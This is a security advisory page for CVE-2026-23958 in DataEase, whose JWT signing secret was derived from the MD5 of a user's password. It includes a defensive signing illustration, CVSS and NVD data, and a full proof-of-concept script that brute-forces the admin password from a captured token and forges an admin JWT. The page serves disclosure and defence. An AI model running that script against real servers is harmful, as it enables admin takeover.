Security Vulnerability Report
CVE-2026-23958 CVSS 9.8 CRITICAL

Published: 2026-01-22 02:15:53
Last Modified: 2026-02-17 16:28:48

Description

Dataease is an open source data visualization analysis tool. Prior to version 2.10.19, DataEase uses the MD5 hash of the user’s password as the JWT signing secret. This deterministic secret derivation allows an attacker to brute-force the admin’s password by exploiting unmonitored API endpoints that verify JWT tokens. The vulnerability has been fixed in v2.10.19. No known workarounds are available.
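The advisory's core point is that a JWT signing secret derived deterministically from a password is only as strong as that password, so a single captured token lets anyone who can guess the password both verify guesses offline and forge tokens. The following is an added illustration, not code from this report or from the DataEase project: it implements HS256 signing with the Python standard library, places the weak derivation beside a hardened one (an independent random 256-bit key generated once at install time), and provides a self-check an operator can run against a token issued by their own deployment. It assumes the weak scheme used the hex MD5 digest of the password as the HMAC key; the exact byte encoding DataEase used is not stated on this page, and the sample password is constructed.

```python
import base64
import hashlib
import hmac
import json
import secrets


def _b64url(data: bytes) -> str:
    """Base64url without padding, as JWS requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def sign_hs256(payload: dict, key: bytes) -> str:
    """Produce a compact JWS (header.payload.signature) using HMAC-SHA256."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode("ascii")
    sig = hmac.new(key, signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_hs256(token: str, key: bytes) -> bool:
    """Constant-time check that the token's signature was produced with `key`."""
    try:
        header, body, sig = token.split(".")
    except ValueError:
        return False
    signing_input = f"{header}.{body}".encode("ascii")
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    try:
        given = base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return hmac.compare_digest(expected, given)


# Weak derivation described in the advisory (assumed encoding: hex MD5 digest
# used directly as the HMAC key). The key's entropy is capped by the password's,
# so a token signed this way lets a password guess be checked offline.
def weak_secret_from_password(password: str) -> bytes:
    return hashlib.md5(password.encode("utf-8")).hexdigest().encode("ascii")


# Hardened alternative: a key independent of any user credential, generated once
# at install time and stored server-side. Guessing a password reveals nothing.
def generate_signing_key() -> bytes:
    return secrets.token_bytes(32)


def secret_is_password_derived(token: str, password: str) -> bool:
    """Operator self-check: does a token issued by our own deployment verify
    under MD5(our own password)? True means the weak derivation is in use."""
    return verify_hs256(token, weak_secret_from_password(password))


if __name__ == "__main__":
    pw = "constructed-example-password"  # constructed sample, not a real credential
    weak_tok = sign_hs256({"sub": "admin"}, weak_secret_from_password(pw))
    strong_tok = sign_hs256({"sub": "admin"}, generate_signing_key())
    print("weak token verifies under MD5(password):", secret_is_password_derived(weak_tok, pw))
    print("random-key token verifies under MD5(password):", secret_is_password_derived(strong_tok, pw))
```

Run as-is it prints `True` for the weak scheme and `False` for the random-key scheme. Note that using a random key is only half of the fix: the patched release also has to rotate out any secret that was ever derived from a password, since tokens signed under the old key remain forgeable until it is retired.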

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* - VULNERABLE
Dataease < 2.10.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import hashlib
import requests
import jwt

# Configuration
TARGET_URL = "http://target-server:8080"
USERNAME = "admin"
PASSWORD_DICT = "rockyou.txt"


def md5_hash(data):
    """Calculate MD5 hash of input data"""
    return hashlib.md5(data.encode()).hexdigest()


def get_jwt_token():
    """Retrieve a valid JWT token from the target system"""
    response = requests.get(f"{TARGET_URL}/api/user/info")
    return response.cookies.get('JWT') or response.json().get('token')


def forge_jwt_token(secret_key):
    """Forge a JWT token using the provided secret key"""
    payload = {
        "sub": USERNAME,
        "role": "admin",
        "exp": 9999999999
    }
    return jwt.encode(payload, secret_key, algorithm='HS256')


def verify_token(token, secret_key):
    """Verify if the token is valid with given secret key"""
    try:
        jwt.decode(token, secret_key, algorithms=['HS256'])
        return True
    except jwt.PyJWTError:  # signature mismatch or malformed token
        return False


def exploit():
    """Main exploit function"""
    print(f"[*] Starting CVE-2026-23958 exploit for {TARGET_URL}")
    original_token = get_jwt_token()
    with open(PASSWORD_DICT, 'r', encoding='utf-8') as f:
        for password in f:
            password = password.strip()
            secret = md5_hash(password)
            if verify_token(original_token, secret):
                print(f"[+] Password found: {password}")
                forged_token = forge_jwt_token(secret)
                print(f"[+] Forged admin token: {forged_token}")
                # Verify admin access
                response = requests.get(
                    f"{TARGET_URL}/api/admin/users",
                    headers={'Authorization': f'Bearer {forged_token}'}
                )
                if response.status_code == 200:
                    print("[+] Admin access confirmed!")
                return True
    return False


if __name__ == "__main__":
    exploit()
```

References

https://github.com/dataease/dataease/security/advisories/GHSA-5wvm-4m4q-rh7j (Exploit, Vendor Advisory)
https://www.ox.security/blog/blog-dataease-cve-2026-23958-admin-takeover/ (Exploit, Third Party Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-23958", "sourceIdentifier": "[email protected]", "published": "2026-01-22T02:15:52.627", "lastModified": "2026-02-17T16:28:47.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dataease is an open source data visualization analysis tool. Prior to version 2.10.19, DataEase uses the MD5 hash of the user’s password as the JWT signing secret. This deterministic secret derivation allows an attacker to brute-force the admin’s password by exploiting unmonitored API endpoints that verify JWT tokens. The vulnerability has been fixed in v2.10.19. No known workarounds are available."}, {"lang": "es", "value": "Dataease es una herramienta de análisis de visualización de datos de código abierto. Antes de la versión 2.10.19, DataEase utiliza el hash MD5 de la contraseña del usuario como secreto de firma JWT. Esta derivación de secreto determinista permite a un atacante forzar por fuerza bruta la contraseña del administrador explotando puntos finales de API no monitoreados que verifican tokens JWT. La vulnerabilidad ha sido corregida en la v2.10.19. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.10.19", "matchCriteriaId": "74084BB3-D364-4DCE-A125-A8509D6284BD"}]}]}], "references": [{"url": "https://github.com/dataease/dataease/security/advisories/GHSA-5wvm-4m4q-rh7j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.ox.security/blog/blog-dataease-cve-2026-23958-admin-takeover/", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Third Party Advisory"]}]}}
```